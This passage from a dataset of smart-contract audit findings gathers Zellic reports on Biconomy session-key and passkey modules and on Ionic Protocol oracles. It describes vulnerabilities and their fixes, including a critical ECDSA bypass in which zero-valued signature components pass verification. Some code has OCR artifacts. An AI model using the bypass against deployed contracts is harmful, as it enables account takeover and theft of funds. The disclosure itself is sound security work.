nonzero values will result in a revert. \u2013 : The value to be sent with the call. _funcCallData \u2013 Control: Full. \u2013 Constraints: Must adhere to the ERC-20 standard. \u2013 : The data for the call. It is parsed inside the SVM. _sessionKeyData \u2013 Control: Full. \u2013 Constraints: Must contain valid session key data that represents session key permissions. \u2013 : SessionKey data that describes sessionKey permissions. None \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : N/A. Branches and code coverage (including function calls) Intended branches Zellic Biconomy Labs Function returns the session key for a valid destinationContract, callValue, and _funcCallData that matches _sessionKeyData. 4\u25a1 Test coverage Negative behavior Function reverts with ERC20SV Invalid Token when destinationContract does not match the token address in _sessionKeyData. 4\u25a1 Negative test Function reverts with ERC20SV Non Zero Value when a nonzero callValue is pro- vided. 4\u25a1 Negative test Function reverts with ERC20SV Wrong Recipient when the recipient in _funcCall Data does not match the intended recipient from _sessionKeyData. 4\u25a1 Negative test Function reverts with ERC20SV Max Amount Exceeded when the amount specified in _funcCallData exceeds the maxAmount described in _sessionKeyData. 4\u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Module: SessionKeyManagerModule.sol Function: setMerkleRoot(byte[32] _merkleRoot) Sets the Merkle root of a tree containing session keys for msg.sender. Inputs", + "labels": [ + "Zellic" + ], + "body": "_merkleRoot \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : The Merkle root of a tree that contains session keys with their per- missions and parameters. Branches and code coverage (including function calls) Intended branches Should successfully set the Merkle root of a tree containing session keys for msg .sender. 4\u25a1 Test coverage Zellic Biconomy Labs Function: validateSessionKey(address smartAccount, uint48 validUntil, uint48 validAfter, address sessionValidationModule, byte[] sessionKeyD ata, byte[32][] merkleProof) Validates that Session Key and parameters are enabled by being included into the Merkle tree. Inputs smartAccount \u2013 Control: Full. \u2013 Constraints: Must be a valid Ethereum address. \u2013 : The smartAccount for which the session key is being validated. validUntil \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : The timestamp when the session key expires. validAfter \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : The timestamp when the session key becomes valid. sessionValidationModule \u2013 Control: Full. \u2013 Constraints: Must be a valid contract address. \u2013 : The address of the Session Validation Module. sessionKeyData \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : The session parameters (limitations/permissions). merkleProof \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : The Merkle proof for the leaf that represents this session key and params. Branches and code coverage (including function calls) Intended branches Function successfully fetches the session key storage for the provided smart account. Zellic Biconomy Labs 4\u25a1 Test coverage Negative behavior Function reverts with SessionNotApproved due to invalid session key (data). 4\u25a1 Negative test Function call analysis rootFunction -> verify(bytes32[], bytes32, bytes32) \u2013 What is controllable?: merkleProof, smartAccount, validUntil, validAfter, sessionValidationModule, and sessionKeyData. \u2013 If return value controllable, how is it used and how can it go wrong?: It is used to verify the proof. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. Function: validateUserOp(UserOperation userOp, byte[32] userOpHash) Validates userOperation. Inputs userOp \u2013 Control: Full. \u2013 Constraints: N/A. \u2013 : User Operation to be validated. userOpHash \u2013 Control: Full. \u2013 Constraints: Must be a valid 32-byte\u2013hash representation of the corre- sponding userOp. \u2013 : Hash of the User Operation to be validated. Branches and code coverage (including function calls) Intended branches Function is successfully invoked. 4\u25a1 Test coverage Negative behavior Function reverts with SIG_VALIDATION_FAILED. 4\u25a1 Negative test Zellic Biconomy Labs Should revert with wrong session key data. 4\u25a1 Negative test Should revert with the wrong session validation module address. 4\u25a1 Negative test Should revert if session key is already expired. 4\u25a1 Negative test Should revert if session key is not yet valid. 4\u25a1 Negative test Should revert with wrong validAfter. 4\u25a1 Negative test Should revert with wrong validUntil. 4\u25a1 Negative test Should revert if signed with the session key that is not in the Merkle tree. 4\u25a1 Negative test Function call analysis rootFunction -> _getSessionData(address) \u2013 What is controllable?: N/A. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. rootFunction -> validateSessionKey(address, uint48, uint48, address, byte[], byte[32][]) \u2013 What is controllable?: userOp. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. rootFunction -> _packValidationData(bool, unit48, uint48) \u2013 What is controllable?: userOp and userOpHash. \u2013 If return value controllable, how is it used and how can it go wrong?: True for signature failure, false for success. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: N/A. Zellic Biconomy Labs 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Biconomy Batched Session Router Module modules, we discovered three findings. No critical issues were found. One finding was of low impact and the other findings were informational in nature. Biconomy Labs acknowledged all findings and implemented fixes.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unexpected reverts where overflow may be desireable", + "labels": [ + "Zellic" + ], + "body": "Target: UniswapTwapPriceOracleV2, UniswapTwapPriceOracleV2Root Category: Business Logic Likelihood: High Severity: Medium : High The UniswapTwapPriceOracleV2 is a modified version of the Compound UniswapTwapPr iceOracleV2 contract. The Compound contract used Open Zeppelin\u2019s SafeMathUpgrad eable to check for arithmetic overflow and underflow issues. Ionic Protocol removed SafeMathUpgradeable and modified the Compound contracts to compile with solidity versions >=0.8.0 which by default includes checked arithmetic to revert on overflows and underflows. The UniswapTwapPriceOracleV2 imports UniswapTwapPriceOracleV2Root which has also been modified to replace the SafeMathUpgradeable functionality with solidity 0.8.0+ default checked arithmetic. However, in UniswapTwapPriceOracleV2Root there are por- tions of code related to price accumulation (currentPx0Cumu, currentPx1Cumu) and time weighted average price (price0TWAP, price1TWAP) where arithmetic overflow is desir- able. For further reading see Dapp\u2019s audit report of Uniswap v2. This issue was duplicated with a parallel, internal review of the code conducted by Ionic Protocol. When calling getUnderlyingPrice, an overflow in either currentPx0Cumu or currentPx1 Cumu would lead to an unexpected transaction reversion, rendering the oracle useless. Review all contracts in the codebase which were updated to compile with solidity 0.8.0+ and place unchecked blocks around code where overflow is desireable. This will allow values to wrap on overflows and underflows as expected in versions of solidity prior to 0.8.0. Below is an example of corrected code for currentPx0Cumu in UniswapTwapPriceOracl eV2Root: Zellic Ionic Protocol function currentPx0Cumu(address pair) internal view returns (uint256 px0Cumu) { uint32 currTime = uint32(block.timestamp); px0Cumu = IUniswapV2Pair(pair).price0CumulativeLast(); (uint256 reserve0, uint256 reserve1, uint32 lastTime) = IUniswapV2Pair(pair).getReserves(); if (lastTime !) block.timestamp) { uint32 timeElapsed = currTime - lastTime; /) overflow is desired px0Cumu += uint256((reserve1 <) 112) / reserve0) * timeElapsed; unchecked { uint32 timeElapsed = currTime - lastTime; /) overflow is desired px0Cumu += uint256((reserve1 <) 112) / reserve0) * timeElapsed; } } } The issue has been fixed by Ionic Protocol in commit a562fda. Zellic Ionic Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Improperly set parameter in constructor may lead to failed redemptions", + "labels": [ + "Zellic" + ], + "body": "Target: JarvisSynthereumLiquidator Category: Business Logic Likelihood: Low Severity: Medium : High Lack of input validation in the constructor on the _txExpirationPeriod parameter may lead to failed redemptions. The variable txExpirationPeriod is included as an anti-slippage measure during re- demptions as it limits the amount of time a transaction can be included in a block. Mistakenly setting the _txExpirationPeriod to 0 or a low value may cause transac- tions to revert which will block user redemptions. It is evident from Ionic Protocols\u2019 deploy script and tests that they have considered this issue and have appropriately set a _txExpirationPeriod time of +40 minutes. There- fore we do not believe this has a security impact presently, but it may lead to future bugs. Consider including a require statement in the constructor to impose a minimum thresh- old for _txExpirationPeriod. The Jarvis documentation recommends setting the ex- piration period to +30 minutes in the future to account for network congestion. The issue has been fixed by Ionic Protocol in commit 782b54. Zellic Ionic Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Lack of input validation in initialize", + "labels": [ + "Zellic" + ], + "body": "Target: CurveLpTokenPriceOracleNoRegistry, FusePoolLens Severity: Low Category: Code Maturity : Low Likelihood: Low The initialize function in both CurveLpTokenPriceOracleNoRegistry and FusePoolL ens does not validate the passed array parameters which may lead to unintended storage outcomes. In both of the initialize functions, Ionic Protocol uses a for-loop to iterate through array parameters and append them to a mapping variable. If the lengths of the ar- rays are not equal, the initialize call will either revert or complete successfully with missing data. In CurveLpTokenPriceOracleNoRegistry, the mappings poolOf and underlyingTokens may not be set to the intended values if the length of the array _lpTokens is less than the length of either the _pools or _poolUnderlyings arrays. In FusePoolLens, the mapping variable hardcoded stores the mapping of token ad- dresses (_hardcodedAddresses) to TokenData which includes a token\u2019s name and symbol. If the length of the _hardcodedAddresses array is less than the length of the _hardcod edNames or _hardcodedSymbols arrays, then parameters in those arrays that exist after _hardcodedAddresses.length will not be stored. Consider adding require statements in the initialize function to validate user-controlled data input and to ensure that array lengths are equal. The issue has been fixed by Ionic Protocol in commit c71037. Zellic Ionic Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Centralization risk over multiple contracts", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple Category: Code Maturity Likelihood: Low Severity: Low : High In oracle contracts such as MasterPriceOracle, the contract\u2019s admin has central au- thority over functions such as setDefaultOracle. Likewise in FusePoolDirectory, the admin has full control over the deployer whitelist. In case of a private key compromise, an attacker could change the defaultOracle to one which will report a favorable price, sandwiching their swap transaction between two calls to setDefaultOracle - the first to set a favorable oracle and the second to return the oracle to the benign default oracle. Similarly, an attacker would be able to whitelist malicious deployer addresses in FusePoolDirectory. Use a multi-signature address wallet, this would prevent an attacker from caus- ing economic damage if a private key were compromised. Set critical functions behind a TimeLock to catch malicious executions in the case of compromise. The issue has been acknowledged by Ionic Protocol and no changes have been made. Ionic Protocol states, \u201cBefore announcing our live platform, we will be transferring ad- min functionality to MultiSig address, avoiding the risks of single point of failure.\u201d Zellic Ionic Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Remove renounceOwnership functionality", + "labels": [ + "Zellic" + ], + "body": "Target: FuseFeeDistributor, FusePoolDirectory and CurveLpTokenPriceOracleNoReg- istry Category: Business Logic Likelihood: N/A Severity: Informational : Informational The FuseFeeDistributor, FusePoolDirectory and CurveLpTokenPriceOracleNoRegistry contracts implement OwnableUpgradeable which provides a method named renoun ceOwnership that removes the current owner (Reference). This is likely not a desired feature. If renounceOwnership were called, the contract would be left without an owner. Override the renounceOwnership function: function renounceOwnership() public override onlyOwner{ revert(\"This feature is not available.\"); } Ionic Protocol states that they may remove ownership of the contracts in the future, so the renounceOwnership functionality remains. However, they have implemented a two step ownership change pattern for added safety when transferring contract ownership in commit eeea03. Ionic Protocol states, \u201cin the future we may want to completely remove ownership on the contracts and allow the system to work permissionlessly. All of the contracts are set up to make this possible, so we do not see this as an issue.\u201d Zellic Ionic Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Ionic Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.1 ECDSA signatures can be trivially bypassed", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The final verification step in the PasskeyRegistryModule plug-in is to call the Verify () function in Secp256r1.sol. The latter does not adequately check the parameters before validation. The passKey parameter is picked directly from the internal mapping of public keys for msg.sender and is not directly controllable for someone else. Being of type uint, both r and s are guaranteed to be positive and the function also verifies that they are less than the order of the curve (the variable nn below). However, it is crucial to also verify that both r !) 0 and s !) 0 to avoid trivial signature bypasses. function Verify( PassKeyId memory passKey, uint r, uint s, uint e ) internal view returns (bool) { if (r >) nn |) s >) nn) { return false; } JPoint[16] memory points = _preComputeJacobianPoints(passKey); return VerifyWithPrecompute(points, r, s, e); } When the ECDSA verifies that a signature is signed by some public key, it takes in the tuple (r,s) (the signature pair) together with a public key and a hash. The hash is generated by hashing some representation of the operation that should be executed, and proving the signature for that hash means the owner of the public key approved the operation. The main calculation for verification in ECDSA is R\u2019 = (h * s_inv) * G + (r * s_inv) * pubKey Zellic Biconomy Labs where s_inv is the inverse of scalar s on the curve (i.e. inverse of s modulo the curve order) and h is the hash. The signature is said to be verified if the x-coordinate of the resulting point is equal to r, as in (R\u2019).x == r Replacing r and s with 0, we get that s_inv is also 0, and the calculation becomes R\u2019 = (h * 0) * G + (0 * 0) * pubKey R\u2019 = 0 * G + 0 * pubKey R\u2019 = 0 == r and the signature verification is always successful. Anyone who can submit operations that will be validated by the PasskeyRegistryMod- ule can impersonate other users and do anything that the account owner could do, leading to loss of funds. Check that none of (r,s) are equal to zero. function Verify( PassKeyId memory passKey, uint r, uint s, uint e ) internal view returns (bool) { if (r >) nn |) s >) nn |) r=)0 |) s=)0) { return false; } JPoint[16] memory points = _preComputeJacobianPoints(passKey); return VerifyWithPrecompute(points, r, s, e); } This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, + { + "title": "3.2 PasskeyRegistryModule reverts when validating user oper- ations", + "labels": [ + "Zellic" + ], + "body": "Target: PasskeyRegistryModule.sol Category: Coding Mistakes Likelihood: High Severity: High : High The PasskeyRegistryModule contract is called from SmartAccount.sol through the va lidateUserOp function, function validateUserOp( UserOperation calldata userOp, bytes32 userOpHash, uint256 missingAccountFunds ) external virtual override returns (uint256 validationData) { if (msg.sender !) address(entryPoint())) revert CallerIsNotAnEntryPoint(msg.sender); (, address validationModule) = abi.decode( userOp.signature, (bytes, address) ); if (address(modules[validationModule]) !) address(0)) { validationData = IAuthorizationModule(validationModule) .validateUserOp(userOp, userOpHash); } else { revert WrongValidationModule(validationModule); } _validateNonce(userOp.nonce); _payPrefund(missingAccountFunds); } where userOp.signature is decoded to figure out the address for the module that should do the actual validation. The validateUserOp() function takes in the raw, un- processed userOp struct (of type UserOperation). Inside PasskeyRegistryModule.sol, the validateUserOp(userOp, userOpHash) function is just a wrapper for _validateSignature(userOp, userOpHash), which is a wrapper for _verifySignature(userOpHash, userOp.signature). Do note that the userOp.sign Zellic Biconomy Labs ature element was passed to the last function. This is the exact same value that was decoded in SmartAccount->validateUserOp(), and it contains both the signature data and the validation module address. The final function, _verifySignature(), starts like this, function _verifySignature( bytes32 userOpDataHash, bytes memory moduleSignature ) internal view returns (bool) { ( bytes32 keyHash, uint256 sigx, uint256 sigy, bytes memory authenticatorData, string memory clientDataJSONPre, string memory clientDataJSONPost ) = abi.decode( moduleSignature, (bytes32, uint256, uint256, bytes, string, string) ); ...)) } where it tries to decode the signature (including the address) as (bytes32, uint256 , uint256, bytes, string, string). This will revert because the validation module address is still a part of the decoded blob. In the SessionKeyManagerModule.sol contract, the validateUserOp() function is im- plemented correctly function validateUserOp( UserOperation calldata userOp, bytes32 userOpHash ) external view virtual returns (uint256) { SessionStorage storage sessionKeyStorage = _getSessionData(msg.sender); (bytes memory moduleSignature, ) = abi.decode( userOp.signature, (bytes, address) ); /) Here it does `abi.decode(moduleSignature, ...)))` Zellic Biconomy Labs ...)) } where the address is stripped off before decoding the remainder. The module will always revert and is not usable. If it is the only available validation module, no user operations can happen. Strip off the address like the SessionKeyManagerModule does, and write test cases for the module. Simple test cases can find mistakes such as these earlier. In general, it is good practice to build a rigorous test suite to ensure the system operates securely and as intended. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing test coverage", + "labels": [ + "Zellic" + ], + "body": "Target: Secp256r1.sol Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The Secp256r1 module implements critical functionality for signature validation, and it is implemented in a nonstandard and highly optimized way. To ensure that the library works in common cases, edge cases, and invalid cases, it is crucial to have proper test coverage for these types of primitives. There are currently no tests using this library, making it hard to see if it works at all. Missing test cases could lead to critical bugs in the cryptographic primitives. These could lead to, for example, Signature forgery and total account takeover Surprising or very random gas costs Proper signatures not validating, leading to DOS Recovery of private keys in extreme cases. Google has Project Wycheproof, which includes many test vectors for common cryp- tographic libraries and their operations. A good match for this module, which uses Secp256r1 (aka NIST P-256) and 256-bit hashes, is to use the ecdsa_secp256r1_sha25 6_test.json test vectors. Do note that many of these vectors target DER decoding, so it is safe to skip tests tagged \u201cBER\u201d. Additionally, test cases where they use numbers larger than 256 bits can be ignored, as they are invalid in Solidity when using uint256 types. These test vectors can be somewhat easily converted to Solidity library tests, giving hundreds of tests for free. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 5c5a6bfe. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy PasskeyRegistry and SessionKeyManager Zellic Audit Report.pdf" + }, { "title": "3.4 Modexp has arbitrary gas limit", "labels": [